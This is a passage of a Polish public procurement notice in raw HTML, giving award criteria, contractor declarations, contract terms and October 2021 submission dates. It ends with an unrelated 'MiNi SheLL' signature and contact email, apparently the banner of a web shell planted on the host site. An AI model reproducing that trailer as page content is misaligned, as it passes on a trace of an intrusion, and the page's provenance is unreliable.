Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokości kary umownej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia, na podstawie art. 108 ust. 1 ustawy Pzp Wykonawca zobowiązany jest do złożenia oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego. Wzór oświadczenia stanowi załącznik nr 5 do SWZ. 2. Szczegółowe wymagania dotyczące formy<br/>złożenia podmiotowych środków dowodowych zostały określone w SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do oferty Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 oraz art. 273 ust. 2 ustawy Pzp w zakresie wskazanym przez Zamawiającego, stanowiące dowód, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. Wzór oświadczenia stanowi załącznik nr 4 do SWZ. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt 1, składa każdy z Wykonawców. <br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>4.	W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru lub wskazania danych umożliwiających Zamawiającemu dostęp do tych dokumentów. <br/>5.	Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt. 4 jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów np. w treści Formularza ofertowego. <br/>6.	Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt. 4 Zamawiający może żądać od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. Forma pełnomocnictwa została wskazana w rozdziale XIV (Sposób i termin składania ofert). <br/>7.	Jeżeli Wykonawca nie złoży wymaganych pełnomocnictw albo złożył wadliwe pełnomocnictwa, Zamawiający wezwie do ich złożenia w terminie przez siebie wskazanym, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. <br/>8.	Do oferty należy dołączyć następujące dokumenty: <br/>1)	Wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy formularz oferty, sporządzony według wzoru stanowiącego załącznik nr 2 do SWZ. (Formularz winien zawierać wszystkie ewentualne zmiany wprowadzone w czasie trwania postępowania). <br/>2)	Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy arkusz cenowy, sporządzony według wzoru stanowiącego załącznik nr 3 do SWZ. (Arkusz winien zawierać wszystkie ewentualne zmiany wprowadzone w czasie trwania postępowania).<br/>9. Treść oferty musi być zgodna z wymaganiami Zamawiającego określonymi w dokumentach zamówienia, w szczególności zgodnie z SWZ. Wzór formularza oferty stanowi załącznik nr 2 do SWZ. <br/><br/>Szczegółowe wymagania dotyczące formy złożenia oświadczeń i dokumentów zostały określone w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1, składa każdy z Wykonawców. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 6 do SWZ.<br/>2.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we wzorze umowy, stanowiącym załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com